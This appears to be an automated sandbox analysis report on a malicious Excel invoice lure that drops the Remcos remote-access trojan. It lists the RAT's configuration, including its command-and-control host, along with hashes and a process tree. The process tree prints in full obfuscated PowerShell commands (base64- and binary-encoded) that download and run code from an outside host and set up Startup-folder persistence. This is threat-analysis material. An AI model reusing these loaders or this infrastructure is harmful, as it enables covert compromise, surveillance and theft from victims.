Overview

overview

10

Static

static

8

ACH Remitt...ce.xls

windows7-x64

10

ACH Remitt...ce.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    06-08-2022 07:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ACH Remittance Advice.xls

  • Size

    32KB

  • MD5

    923b393d7738d5c824a4da64abd6007e

  • SHA1

    9446fcfd725c935e80f0312aa9a2dfdd0239515e

  • SHA256

    9974c9454063925957f3353990334261dcedd5372c664c4a2e49b478b3a22c6a

  • SHA512

    0b965ad2be591cd8d5a18ace6154fc33f2da6f320731e25f9206ad8ccd8c189d81a8616bec403576b3203ef824ad86829986e4db6566a0395dae97f4a4d06f0d

Score
10/10
remcosremotehostrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

williamsmack.duckdns.org:991

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Remcos-947HIW

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 63 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Advice.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\rSunt.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:472
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi5kYXBldG9uXCcnK3BtZXQ6dm5lJCwnJ3Nidi50bmVpbEMgZGV0Y2V0b3JQL2FtdXovbW9jLmxpb2Nhdm90b2cvLzpwdHRoJycoZWxpRmRhJzskVEM9JGMzLCRiNGRmLCR3ZTIyIC1Kb2luICcnO0lFWCgoW3JlZ2V4XTo6TWF0Y2hlcygkVEMsJy4nLCdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJyk7c3RhcnQtcHJvY2VzcygkZW52OnRlbXArICdcbm90ZXBhZC52YnMnKTtyZW1vdmUtaXRlbSAoJGVudjpVU0VSUFJPRklMRSArICdcclN1bnQuYmF0Jyk=')))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:916
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\notepad.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01100111,01101111,01110100,01101111,01110110,01100001,01100011,01101111,01101001,01101100,00101110,01100011,01101111,01101101,00101111,01111010,01110101,01101101,01100001,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:596
            • C:\WINDOWS\syswow64\notepad.exe
              "C:\WINDOWS\syswow64\notepad.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:1776
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\notepad.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.vbs'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:332
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1832

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\notepad.vbs
    Filesize

    2KB

    MD5

    73f8e1445619ca6f6033e27061d0a7f1

    SHA1

    1302c15d08b98608019d3ca3f938781f36c571c0

    SHA256

    055e6423f966d61439f2dd045a128cc531b44056b2facd114a0800fae39ba71f

    SHA512

    c42a315c6587974cca8af750b7bd5066f2cf13027cef9dbde131f3a5bc21df8f9798c7137521a8957df07bb2f929210913f7362a69cf19472f16b9015e332b66

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    317e4c2bce724dc5b39b20c7df5a6921

    SHA1

    aca71687fb021fad2d994a0d10a5f44eb83a633e

    SHA256

    ebcde5284ed6c29f14dc2fd856ee933d323549449fd0693c188ee6dc5242bf1a

    SHA512

    904b22cec00300f4cbf6c4d1b028be05d561aaa582e0531ad75731bce29ff1adc79d2363fa0fab6210a6a373284f4cfd541dbd8c009a4790a5ce23b9c4541f9b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    317e4c2bce724dc5b39b20c7df5a6921

    SHA1

    aca71687fb021fad2d994a0d10a5f44eb83a633e

    SHA256

    ebcde5284ed6c29f14dc2fd856ee933d323549449fd0693c188ee6dc5242bf1a

    SHA512

    904b22cec00300f4cbf6c4d1b028be05d561aaa582e0531ad75731bce29ff1adc79d2363fa0fab6210a6a373284f4cfd541dbd8c009a4790a5ce23b9c4541f9b

    Download Submit
  • C:\Users\Admin\rSunt.bat
    Filesize

    851B

    MD5

    7d1f2546a02f646bae923f65af72232e

    SHA1

    f98681535282671986a0b8c83b9cab2c09038bfa

    SHA256

    3c740e77447246809df1c7caab8595bb8fb3dada9a36b0381b20f6355ef37ffc

    SHA512

    0b46996a86126a613dba4660e62996198ecf12685fd0261aca65fce96b605390303146e7ebdea34ba34efbb70b8fb05621a5c1b2ec5d075103619f027a03377d

    Download Submit
  • \Users\Admin\AppData\Local\Temp\88de0a69-f9a2-47a8-a496-9370c134a53c\AgileDotNetRT.dll
    Filesize

    94KB

    MD5

    14ff402962ad21b78ae0b4c43cd1f194

    SHA1

    f8a510eb26666e875a5bdd1cadad40602763ad72

    SHA256

    fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

    SHA512

    daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

    Download Submit
  • memory/332-97-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/332-92-0x0000000000000000-mapping.dmp
    Download
  • memory/472-81-0x0000000000000000-mapping.dmp
    Download
  • memory/596-98-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/596-91-0x0000000000000000-mapping.dmp
    Download
  • memory/596-116-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/916-88-0x000000006C800000-0x000000006CDAB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/916-85-0x000000006C800000-0x000000006CDAB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/916-83-0x0000000000000000-mapping.dmp
    Download
  • memory/1624-86-0x0000000000000000-mapping.dmp
    Download
  • memory/1776-101-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-102-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-120-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-119-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-118-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-114-0x000000000043168C-mapping.dmp
    Download
  • memory/1776-113-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-111-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-109-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-108-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-107-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-106-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/1776-104-0x0000000000400000-0x000000000047E000-memory.dmp
    Filesize

    504KB

    Download
  • memory/2004-79-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2004-66-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-65-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-63-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-64-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-90-0x0000000072C6D000-0x0000000072C78000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2004-62-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-61-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-60-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-59-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-58-0x0000000072C6D000-0x0000000072C78000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2004-57-0x00000000760F1000-0x00000000760F3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2004-68-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-54-0x000000002F0B1000-0x000000002F0B4000-memory.dmp
    Filesize

    12KB

    Download
  • memory/2004-67-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-69-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-70-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-80-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-77-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-78-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-76-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-74-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-75-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-55-0x0000000071C81000-0x0000000071C83000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2004-73-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-72-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2004-71-0x00000000006B7000-0x00000000006BB000-memory.dmp
    Filesize

    16KB

    Download